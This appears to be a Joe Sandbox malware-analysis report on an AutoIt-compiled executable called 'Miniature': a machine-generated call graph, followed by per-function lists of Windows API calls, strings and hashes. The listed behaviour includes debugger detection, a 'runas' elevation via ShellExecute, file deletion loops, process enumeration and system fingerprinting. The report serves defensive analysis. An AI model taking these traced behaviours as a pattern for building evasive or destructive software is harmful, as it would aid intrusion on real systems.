99642 fff9ae Mailbox 99626->99642 99628 fff9c1 99643 ff399c 99628->99643 99630 fff97a 99631 fa162d 59 API calls 99630->99631 99634 fff98a 99631->99634 99632->99628 99632->99630 99633 fa42cf CloseHandle 99635 fffa20 99633->99635 99636 fa1c9c 59 API calls 99634->99636 99635->99617 99669 fa3f0b CloseHandle 99635->99669 99637 fff994 99636->99637 99639 fa1900 59 API calls 99637->99639 99640 fff9a2 99639->99640 99641 ff399c 66 API calls 99640->99641 99641->99642 99642->99617 99642->99633 99644 ff39af 99643->99644 99645 ff3a15 99643->99645 99644->99645 99646 ff39b4 99644->99646 99647 ff394d 3 API calls 99645->99647 99648 ff3a09 99646->99648 99649 ff39be 99646->99649 99661 ff39fd Mailbox 99647->99661 99674 ff3a35 62 API calls Mailbox 99648->99674 99651 ff39de 99649->99651 99652 ff39c8 99649->99652 99653 fa40cd 59 API calls 99651->99653 99654 fa40cd 59 API calls 99652->99654 99655 ff39e6 99653->99655 99657 ff39d0 99654->99657 99673 ff38e0 61 API calls Mailbox 99655->99673 99659 fa402a 61 API calls 99657->99659 99658 ff39dc 99670 ff397e 99658->99670 99659->99658 99661->99642 99663 ff8cde 99662->99663 99664 ff8cd9 99662->99664 99663->99620 99675 ff7d6e 61 API calls 2 library calls 99664->99675 99666->99612 99667->99617 99668->99616 99669->99617 99671 ff394d 3 API calls 99670->99671 99672 ff3990 99671->99672 99672->99661 99673->99658 99674->99661 99675->99663 99677 fa1207 59 API calls 99676->99677 99678 ff4024 99677->99678 99679 fa1207 59 API calls 99678->99679 99680 ff402d 99679->99680 99681 fa1207 59 API calls 99680->99681 99682 ff4036 99681->99682 99683 fb0284 60 API calls 99682->99683 99684 ff4041 99683->99684 99685 ff4fec GetFileAttributesW 99684->99685 99686 ff404a 99685->99686 99687 ff405c 99686->99687 99688 fa1900 59 API calls 99686->99688 99689 fb0119 59 API calls 99687->99689 99688->99687 99690 ff4070 FindFirstFileW 99689->99690 99691 ff408f 99690->99691 99692 ff40fc FindClose 99690->99692 99691->99692 99693 ff40d7 FindNextFileW 99691->99693 99694 fa1c9c 59 API calls 99691->99694 99695 fa17e0 59 API calls 99691->99695 99696 fa1900 59 API calls 99691->99696 99697 ff4107 Mailbox 99692->99697 99693->99691 99694->99691 99695->99691 99698 ff40c8 DeleteFileW 99696->99698 99697->99413 99698->99693 99699 ff40f3 FindClose 99698->99699 99699->99697 99700->99324 99701->98638 99702 f91016 99707 fa5ce7 99702->99707 99705 fb2f70 __cinit 67 API calls 99706 f91025 99705->99706 99708 fb0fe6 Mailbox 59 API calls 99707->99708 99709 fa5cef 99708->99709 99711 f9101b 99709->99711 99714 fa5f39 99709->99714 99711->99705 99715 fa5f42 99714->99715 99717 fa5cfb 99714->99717 99716 fb2f70 __cinit 67 API calls 99715->99716 99716->99717 99718 fa5d13 99717->99718 99719 fa1207 59 API calls 99718->99719 99720 fa5d2b GetVersionExW 99719->99720 99721 fa1821 59 API calls 99720->99721 99722 fa5d6e 99721->99722 99723 fa1981 59 API calls 99722->99723 99733 fa5d9b 99722->99733 99724 fa5d8f 99723->99724 99725 fa133d 59 API calls 99724->99725 99725->99733 99726 fa5e00 GetCurrentProcess IsWow64Process 99727 fa5e19 99726->99727 99729 fa5e98 GetSystemInfo 99727->99729 99730 fa5e2f 99727->99730 99728 fe1098 99731 fa5e65 99729->99731 99742 fa55f0 99730->99742 99731->99711 99733->99726 99733->99728 99735 fa5e8c GetSystemInfo 99738 fa5e56 99735->99738 99736 fa5e41 99737 fa55f0 2 API calls 99736->99737 99739 fa5e49 GetNativeSystemInfo 99737->99739 99738->99731 99740 fa5e5c FreeLibrary 99738->99740 99739->99738 99740->99731 99743 fa5619 99742->99743 99744 fa55f9 LoadLibraryA 99742->99744 99743->99735 99743->99736 99744->99743 99745 fa560a GetProcAddress 99744->99745 99745->99743 101123 f91066 101128 f9aaaa 101123->101128 101125 f9106c 101126 fb2f70 __cinit 67 API calls 101125->101126 101127 f91076 101126->101127 101129 f9aacb 101128->101129 101161 fb02eb 101129->101161 101133 f9ab12 101134 fa1207 59 API calls 101133->101134 101135 f9ab1c 101134->101135 101136 fa1207 59 API calls 101135->101136 101137 f9ab26 101136->101137 101138 fa1207 59 API calls 101137->101138 101139 f9ab30 101138->101139 101140 fa1207 59 API calls 101139->101140 101141 f9ab6e 101140->101141 101142 fa1207 59 API calls 101141->101142 101143 f9ac39 101142->101143 101171 fb0588 101143->101171 101147 f9ac6b 101148 fa1207 59 API calls 101147->101148 101149 f9ac75 101148->101149 101199 fafe2b 101149->101199 101151 f9acbc 101152 f9accc GetStdHandle 101151->101152 101153 f9ad18 101152->101153 101154 fd2f39 101152->101154 101155 f9ad20 OleInitialize 101153->101155 101154->101153 101156 fd2f42 101154->101156 101155->101125 101206 ff70f3 64 API calls Mailbox 101156->101206 101158 fd2f49 101207 ff77c2 CreateThread 101158->101207 101160 fd2f55 CloseHandle 101160->101155 101208 fb03c4 101161->101208 101164 fb03c4 59 API calls 101165 fb032d 101164->101165 101166 fa1207 59 API calls 101165->101166 101167 fb0339 101166->101167 101168 fa1821 59 API calls 101167->101168 101169 f9aad1 101168->101169 101170 fb07bb 6 API calls 101169->101170 101170->101133 101172 fa1207 59 API calls 101171->101172 101173 fb0598 101172->101173 101174 fa1207 59 API calls 101173->101174 101175 fb05a0 101174->101175 101215 fa10c3 101175->101215 101178 fa10c3 59 API calls 101179 fb05b0 101178->101179 101180 fa1207 59 API calls 101179->101180 101181 fb05bb 101180->101181 101182 fb0fe6 Mailbox 59 API calls 101181->101182 101183 f9ac43 101182->101183 101184 faff4c 101183->101184 101185 faff5a 101184->101185 101186 fa1207 59 API calls 101185->101186 101187 faff65 101186->101187 101188 fa1207 59 API calls 101187->101188 101189 faff70 101188->101189 101190 fa1207 59 API calls 101189->101190 101191 faff7b 101190->101191 101192 fa1207 59 API calls 101191->101192 101193 faff86 101192->101193 101194 fa10c3 59 API calls 101193->101194 101195 faff91 101194->101195 101196 fb0fe6 Mailbox 59 API calls 101195->101196 101197 faff98 RegisterWindowMessageW 101196->101197 101197->101147 101200 fafe3b 101199->101200 101201 fe620c 101199->101201 101203 fb0fe6 Mailbox 59 API calls 101200->101203 101218 ffa12a 59 API calls 101201->101218 101205 fafe43 101203->101205 101204 fe6217 101205->101151 101206->101158 101207->101160 101219 ff77a8 65 API calls 101207->101219 101209 fa1207 59 API calls 101208->101209 101210 fb03cf 101209->101210 101211 fa1207 59 API calls 101210->101211 101212 fb03d7 101211->101212 101213 fa1207 59 API calls 101212->101213 101214 fb0323 101213->101214 101214->101164 101216 fa1207 59 API calls 101215->101216 101217 fa10cb 101216->101217 101217->101178 101218->101204 101220 fce463 101221 f9373a 59 API calls 101220->101221 101222 fce479 101221->101222 101223 fce48f 101222->101223 101224 fce4fa 101222->101224 101232 f95376 60 API calls 101223->101232 101226 f9b020 298 API calls 101224->101226 101231 fce4ee Mailbox 101226->101231 101228 fce4ce 101228->101231 101233 ff890a 59 API calls Mailbox 101228->101233 101229 fcf046 Mailbox 101231->101229 101234 ffa48d 89 API calls 4 library calls 101231->101234 101232->101228 101233->101231 101234->101229
                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA526C
                                                  • IsDebuggerPresent.KERNEL32 ref: 00FA527E
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00FA52E6
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                    • Part of subcall function 00F9BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F9BC07
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA5366
                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00FE0B2E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00FE0B66
                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01046D10), ref: 00FE0BE9
                                                  • ShellExecuteW.SHELL32(00000000), ref: 00FE0BF0
                                                    • Part of subcall function 00FA514C: GetSysColorBrush.USER32(0000000F), ref: 00FA5156
                                                    • Part of subcall function 00FA514C: LoadCursorW.USER32(00000000,00007F00), ref: 00FA5165
                                                    • Part of subcall function 00FA514C: LoadIconW.USER32(00000063), ref: 00FA517C
                                                    • Part of subcall function 00FA514C: LoadIconW.USER32(000000A4), ref: 00FA518E
                                                    • Part of subcall function 00FA514C: LoadIconW.USER32(000000A2), ref: 00FA51A0
                                                    • Part of subcall function 00FA514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA51C6
                                                    • Part of subcall function 00FA514C: RegisterClassExW.USER32(?), ref: 00FA521C
                                                    • Part of subcall function 00FA50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA5109
                                                    • Part of subcall function 00FA50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA512A
                                                    • Part of subcall function 00FA50DB: ShowWindow.USER32(00000000), ref: 00FA513E
                                                    • Part of subcall function 00FA50DB: ShowWindow.USER32(00000000), ref: 00FA5147
                                                    • Part of subcall function 00FA59D3: _memset.LIBCMT ref: 00FA59F9
                                                    • Part of subcall function 00FA59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA5A9E
                                                  Strings
                                                  • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00FE0B28
                                                  • AutoIt, xrefs: 00FE0B23
                                                  • runas, xrefs: 00FE0BE4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                  • API String ID: 529118366-2030392706
                                                  • Opcode ID: 075f2c9e0b7141af563ee5ff4fbda761e947b08184726ff23b8f48445d3e9cbc
                                                  • Instruction ID: 55f17c3f8225d685d0623abaff85982dc92043b5ad5bbe246cc96d1b41b84df0
                                                  • Opcode Fuzzy Hash: 075f2c9e0b7141af563ee5ff4fbda761e947b08184726ff23b8f48445d3e9cbc
                                                  • Instruction Fuzzy Hash: 015115B1D00348AADF21ABB0DC42EFF7B79BF86790F104069F891A6146CABD4544FB21
                                                  APIs
                                                    • Part of subcall function 00FB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA2A58,?,00008000), ref: 00FB02A4
                                                    • Part of subcall function 00FF4FEC: GetFileAttributesW.KERNEL32(?,00FF3BFE), ref: 00FF4FED
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00FF3D96
                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00FF3E3E
                                                  • MoveFileW.KERNEL32(?,?), ref: 00FF3E51
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00FF3E6E
                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00FF3E90
                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00FF3EAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 4002782344-1173974218
                                                  • Opcode ID: d6f381986d419dda69d9b155b91028907015f8882af791592b86b798c92640dc
                                                  • Instruction ID: e53b8bde3509cdb874f5175d3ddb1198f8666585d29b83094f91f260485b38c1
                                                  • Opcode Fuzzy Hash: d6f381986d419dda69d9b155b91028907015f8882af791592b86b798c92640dc
                                                  • Instruction Fuzzy Hash: 70517E7180111DAACF15EBA0CD929FEB779AF12311F200165E546B31A2EF396F0DEB60
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00FA5D40
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                  • GetCurrentProcess.KERNEL32(?,01020A18,00000000,00000000,?), ref: 00FA5E07
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00FA5E0E
                                                  • GetNativeSystemInfo.KERNEL32(00000000), ref: 00FA5E54
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00FA5E5F
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00FA5E90
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00FA5E9C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                  • String ID:
                                                  • API String ID: 1986165174-0
                                                  • Opcode ID: e82a79d94042335850569cd73d27ca9b475a63697a30e9ead17223bf9fe4e05a
                                                  • Instruction ID: 4251bb5b9bc26fe69c7428f356c875b0883c377201c38de37c5e5110490051c0
                                                  • Opcode Fuzzy Hash: e82a79d94042335850569cd73d27ca9b475a63697a30e9ead17223bf9fe4e05a
                                                  • Instruction Fuzzy Hash: BC91F771989BC0DEC731CB7584905ABFFE5AF3A310B980A5ED0C793A01D234A548E759
                                                  APIs
                                                    • Part of subcall function 00FB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA2A58,?,00008000), ref: 00FB02A4
                                                    • Part of subcall function 00FF4FEC: GetFileAttributesW.KERNEL32(?,00FF3BFE), ref: 00FF4FED
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00FF407C
                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FF40CC
                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00FF40DD
                                                  • FindClose.KERNEL32(00000000), ref: 00FF40F4
                                                  • FindClose.KERNEL32(00000000), ref: 00FF40FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 2649000838-1173974218
                                                  • Opcode ID: d90f3bc47ffa49d7471f556faa83a26d377976db0fa85ece293bd13476910f40
                                                  • Instruction ID: 9a5fcf0f5beea4adbe592035021e156dba4427f048058f34de9995f32b23bc5c
                                                  • Opcode Fuzzy Hash: d90f3bc47ffa49d7471f556faa83a26d377976db0fa85ece293bd13476910f40
                                                  • Instruction Fuzzy Hash: D83182710083499BC311EF64CC919BFB7E8BE96315F440A1DF5E582191EF29E90DE752
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00FF416D
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00FF417B
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00FF419B
                                                  • CloseHandle.KERNEL32(00000000), ref: 00FF4245
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: d7f297f89a012e09664face9c5ad0ebc4980139fff51072795c9083a01808906
                                                  • Instruction ID: d4f5eece3b14fca1b2b5b17607fa2f44125c8cdd7b28cef5e4ce0f77b4162385
                                                  • Opcode Fuzzy Hash: d7f297f89a012e09664face9c5ad0ebc4980139fff51072795c9083a01808906
                                                  • Instruction Fuzzy Hash: 9C318BB11083459BD310EF50D885ABFBBE8BF96350F10092DF685821A1EB65AA49DB92
                                                  APIs
                                                    • Part of subcall function 00FA3740: CharUpperBuffW.USER32(?,010571DC,00000000,?,00000000,010571DC,?,00F953A5,?,?,?,?), ref: 00FA375D
                                                  • _memmove.LIBCMT ref: 00F9B68A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper_memmove
                                                  • String ID:
                                                  • API String ID: 2819905725-0
                                                  • Opcode ID: 8a138d5291b32a8e049a2de2c996d35fe5410f79274ba5741da36f3ac5e5c107
                                                  • Instruction ID: 280e2bd7098762663d0045adcb28a8ac0b7f8107a32b1e776eb575d91040db94
                                                  • Opcode Fuzzy Hash: 8a138d5291b32a8e049a2de2c996d35fe5410f79274ba5741da36f3ac5e5c107
                                                  • Instruction Fuzzy Hash: 2CA28A71A08341CFEB20CF14D580B2AB7E1BF84314F18895EE99A8B361D775ED45EB92
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,00FDFC86), ref: 00FF495A
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00FF496B
                                                  • FindClose.KERNEL32(00000000), ref: 00FF497B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: ba8d450af7d72b23b7dcfbf1edc2be780ad1b000d1ab39ee4be743ff24e4ca13
                                                  • Instruction ID: 4d9a6d4b7e162f8420f07bd3e1b4cc4ed1a98cad217eb3cf223894486e7b8394
                                                  • Opcode Fuzzy Hash: ba8d450af7d72b23b7dcfbf1edc2be780ad1b000d1ab39ee4be743ff24e4ca13
                                                  • Instruction Fuzzy Hash: 0AE0D8319107099752306A38EC0D4FB775C9E06335F700705F575C14D4E7B4A9445799
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cfa5f1a32f2b3560b6aab978cf15c6c45d4e8f9e08be8f22e5febfce0cce7fe9
                                                  • Instruction ID: b2365b3ec33d7641976008411c39a0b7f436d66fa9286c2fdadec461f60dadc4
                                                  • Opcode Fuzzy Hash: cfa5f1a32f2b3560b6aab978cf15c6c45d4e8f9e08be8f22e5febfce0cce7fe9
                                                  • Instruction Fuzzy Hash: CC22BE71E082058FEF24DF58C880BAEB7B1FF55310F19816EE8569B341D7B4A981EB91
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00F9BF57
                                                    • Part of subcall function 00F952B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F952E6
                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00FD36B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessagePeekSleepTimetime
                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                  • API String ID: 1792118007-922114024
                                                  • Opcode ID: 7dee15433809acb0afece20aef77a2fb9f35e83d16e470a85595a85f39fa2bf7
                                                  • Instruction ID: c7b4ad7f5cf5e1749d17c4a666e81276e3158bfbfc67de768ed647a95526429c
                                                  • Opcode Fuzzy Hash: 7dee15433809acb0afece20aef77a2fb9f35e83d16e470a85595a85f39fa2bf7
                                                  • Instruction Fuzzy Hash: 16C2C370A08341DFDB24DF24C844BAAB7E5BF84314F18491EF58A97391CB75E944EB82
                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00F93444
                                                  • RegisterClassExW.USER32(00000030), ref: 00F9346E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F9347F
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00F9349C
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F934AC
                                                  • LoadIconW.USER32(000000A9), ref: 00F934C2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F934D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: acebf4e03c359771a769b3143fe03624334c59122e4ea99a94bb76f218a5144e
                                                  • Instruction ID: 63b4d7d2747f57a1f07bfd849a7b8c9069672f8fe3b2177ef010c85590b01409
                                                  • Opcode Fuzzy Hash: acebf4e03c359771a769b3143fe03624334c59122e4ea99a94bb76f218a5144e
                                                  • Instruction Fuzzy Hash: B7314A71D41309EFEB608FA4D889ADABBF0FF09310F10416AF590E6284E7BA0545DF51
                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00F93444
                                                  • RegisterClassExW.USER32(00000030), ref: 00F9346E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F9347F
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00F9349C
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F934AC
                                                  • LoadIconW.USER32(000000A9), ref: 00F934C2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F934D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
